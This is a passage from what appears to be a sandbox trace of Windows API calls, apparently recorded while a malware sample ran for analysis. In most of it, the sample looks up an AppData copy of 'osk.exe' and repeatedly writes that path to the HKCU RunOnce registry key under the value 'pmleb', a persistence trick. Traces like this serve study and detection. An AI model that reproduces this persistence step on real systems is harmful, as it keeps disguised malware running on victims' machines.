dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.924] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x54 [0081.924] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.925] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.925] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.925] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.925] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.925] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.925] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.925] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.925] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.925] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.925] RegCloseKey (hKey=0x280) returned 0x0 [0081.926] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.926] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.926] SetTimer (hWnd=0x20280, nIDEvent=0x20d0, uElapse=0xa, lpTimerFunc=0x0) returned 0x20d0 [0081.926] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.937] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.937] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.937] KillTimer (hWnd=0x20280, uIDEvent=0x20d0) returned 1 [0081.937] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.937] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.937] IUnknown:Release (This=0x787518) returned 0x1 [0081.937] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.937] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.938] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.938] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.938] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.938] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.938] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.938] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.938] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.938] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x55 [0081.938] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.938] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x56 [0081.938] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.939] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x55 [0081.939] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.939] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.939] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.939] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.939] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.939] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.940] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.940] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.940] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.940] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.940] RegCloseKey (hKey=0x280) returned 0x0 [0081.940] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.940] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.940] SetTimer (hWnd=0x20280, nIDEvent=0x20d1, uElapse=0xa, lpTimerFunc=0x0) returned 0x20d1 [0081.941] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.953] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.953] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.953] KillTimer (hWnd=0x20280, uIDEvent=0x20d1) returned 1 [0081.953] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.953] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.953] IUnknown:Release (This=0x787518) returned 0x1 [0081.953] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.954] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.954] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.954] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.954] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.954] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.954] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.954] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.954] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.954] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x56 [0081.954] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.954] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x57 [0081.954] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.955] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x56 [0081.955] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.955] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.955] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.956] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.956] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.956] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.956] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.956] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.956] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.956] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.956] RegCloseKey (hKey=0x280) returned 0x0 [0081.956] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.957] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.957] SetTimer (hWnd=0x20280, nIDEvent=0x20d2, uElapse=0xa, lpTimerFunc=0x0) returned 0x20d2 [0081.957] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.968] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.968] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.968] KillTimer (hWnd=0x20280, uIDEvent=0x20d2) returned 1 [0081.968] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.968] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.968] IUnknown:Release (This=0x787518) returned 0x1 [0081.969] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.969] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.969] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.969] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.969] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.969] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.969] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.969] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.969] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.969] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x57 [0081.969] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.969] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x58 [0081.969] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: 